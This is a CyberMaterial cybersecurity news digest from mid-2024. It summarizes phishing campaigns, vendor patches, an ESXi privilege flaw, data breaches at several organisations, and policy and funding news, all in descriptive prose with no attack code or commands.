π What’s the latest in the cyber world today?
OneDrive, PowerShell Script, Security Updates, iOS, macOS, tvOS, visionOS, VMware, ESXi Hypervisor, Admin Privileges, Proofpoint, Email Routing, Phishing, DigiCert, SSL/TLS Certificates, Domain Verification, Zeus Group, Israeli Athletes, Paris Olympics, Northeast Rehabilitation Hospital Network, Patient Data, Russia, Avanpost, Pro-Ukrainian Hackers, RA World, Melchers, UAB Nursing School, Recruitment Postcard, European Central Bank, Stress Test, US, TikTok Ban, National Security, UK, Information Commissionerβs Office, Electoral Commission, Security Issue, Reserve Bank of India, Local Data Breach, ZeroTier, Series A, Funding, Virtual Networking
Listen to the full podcast
π¨Β Cyber Alerts
A sophisticated phishing campaign targeting Microsoft OneDrive users has been discovered, leveraging social engineering to execute a malicious PowerShell script. Dubbed “OneDrive Pastejacking,” the attack involves sending an email with an HTML file that simulates a OneDrive error page. Users are deceived into opening a PowerShell terminal and running a Base64-encoded command, leading to the download and execution of a malicious script.
Apple has issued critical security updates for a range of its operating systems, including iOS, macOS, tvOS, visionOS, watchOS, and Safari, addressing numerous vulnerabilities. The updates, released on July 30, 2024, include iOS 17.6 and iPadOS 17.6, which patch 35 security flaws that could lead to authentication bypasses, unexpected application terminations, system shutdowns, information disclosure, denial-of-service attacks, and memory leaks.
Microsoft researchers have uncovered a severe vulnerability in VMware ESXi hypervisors which grants full administrative access to unauthorized users. This flaw allows members of a specially named domain group, βESX Admins,β to gain unrestricted admin privileges on ESXi hypervisors without proper validation. Exploited by ransomware groups such as Storm-0506 and Octo Tempest, the vulnerability enables attackers to encrypt the hypervisorβs file system, disrupting all hosted virtual machines and potentially leading to data exfiltration and lateral network movement.
An extensive phishing campaign has exploited a significant email routing flaw in Proofpoint’s security infrastructure, affecting millions of users. The campaign, dubbed “EchoSpoofing” by Guardio Labs, involved threat actors sending spoofed emails from well-known companies such as Best Buy, IBM, Nike, and Walt Disney. The flaw in Proofpoint’s servers allowed these emails to bypass traditional security measures, including SPF and DKIM authentication, making them appear legitimate.
DigiCert, a prominent certificate authority, has announced the revocation of thousands of SSL/TLS certificates due to a critical Domain Control Verification error. The issue, stemming from a failure to include an underscore prefix in DNS-based CNAME records, affects approximately 0.4% of domain validations. This oversight violates the CA/Browser Forum’s strict verification rules, necessitating the immediate revocation of non-compliant certificates.
π₯ Cyber Incidents
On July 29, 2024, the hacker group known as “Zeus” leaked sensitive data of Israeli athletes participating in the Paris Olympics, including blood test results and login credentials. The breach, revealed on Telegram, led France’s Anti-Cybercrime Office (OFAC) to urgently seek the removal of the compromised information. Zeus, also reported to have disclosed the military status of Israeli athletes, has heightened security concerns amid the ongoing Gaza conflict.
Northeast Rehabilitation Hospital Network (NRHN) has reported a data privacy incident affecting certain current or former patients. Unauthorized access to NRHNβs network occurred between May 13 and May 22, 2024, potentially compromising files containing personal and medical information. While there is no evidence of identity theft or fraud, NRHN is actively investigating and has informed federal law enforcement. The network is enhancing its security measures and reviewing policies to prevent future incidents.
A pro-Ukrainian hacker group known as Cyber Anarchy Squad has claimed responsibility for a significant cyberattack on Russian information security firm Avanpost. The group reported encrypting over 400 virtual machines and physical workstations, destroying more than 60 terabytes of data, and leaking 390 gigabytes of sensitive information. Avanpost, which has been operating for 15 years and provides security systems for various Russian enterprises, confirmed the breach, describing it as a serious cyberattack.
The Bremen-based retail group Melchers has fallen victim to a ransomware attack carried out by the group RA World. The cybercriminals have claimed to have stolen 15 gigabytes of sensitive data, including financial records and business documents, from Melchers’ Singapore branch. While RA World has boasted about the breach on the darknet, Melchers has denied any data leakage. The company has confirmed the attack and is currently working with external experts to restore its systems using backups and investigate the incident further.
The University of Alabama at Birmingham (UAB) School of Nursing has notified 1,655 patients in Birmingham, Alabama, of a privacy breach involving a study recruitment postcard. The postcard, intended for a breast cancer diagnosis survey, inadvertently displayed patients’ names, addresses, and inferred diagnoses. UAB acknowledged the error and has apologized, detailing steps taken to prevent future incidents.
π’ Cyber News
The European Central Bank (ECB) has concluded its inaugural cyber stress test for the European banking sector, revealing that while banks have robust response and recovery frameworks, there is notable room for improvement. The test, conducted in January and involving 109 banks, assessed the sector’s resilience against cyber disruptions. Although banks demonstrated high-level preparedness, weaknesses in recovery capabilities, particularly in worst-case scenarios, were identified.
The U.S. Justice Department is vigorously defending the constitutionality of a new law that could either force TikTok to divest its U.S. assets or result in a ban on the app starting January 2025. In response to TikTok’s lawsuit challenging the law, which TikTok argues infringes on free speech, the Justice Department asserts that the legislation is necessary to address national security concerns. The department contends that TikTok’s ownership by Chinese company ByteDance poses risks of sensitive data exposure and potential manipulation of information consumed by American users.Β
The Information Commissionerβs Office (ICO) has sharply criticized the UK Electoral Commission for significant security shortcomings that allowed hackers to access personal details of 40 million British voters. The ICO’s investigation into the August 2021 data breach revealed that the Commission failed to implement essential security measures, such as updating its Microsoft Exchange Server and enforcing robust password management policies. The breach, which went undetected until October 2022, was attributed to exploitation of known vulnerabilities and poor security practices.
According to the Reserve Bank of Indiaβs 2024 cybersecurity report, the average cost of a data breach in India surged to $2.18 million in 2023, marking a 28% increase since 2020. The report highlights that phishing and stolen credentials are now the leading attack vectors, with phishing accounting for 22% of incidents. The number of security incidents in India skyrocketed from 53,117 in 2017 to 1.32 million in 2023. The automotive sector emerged as the most vulnerable industry, while the BFSI sector, due to stringent regulations, reported comparatively better protection.
ZeroTier, a leading provider of virtual networking solutions, has raised $13.5 million in Series A funding led by Battery Ventures, with participation from several other investors including 7percent Ventures and Airbridge Equity Partners. Founded in 2011 and based in Irvine, CA, ZeroTier offers a secure and scalable network solution optimized for IoT deployments, connecting over three million devices across 230 countries. The company plans to use the new funds to drive innovation, enhance product development, and expand its market presence.
Copyright Β© 2024 CyberMaterial. All Rights Reserved.
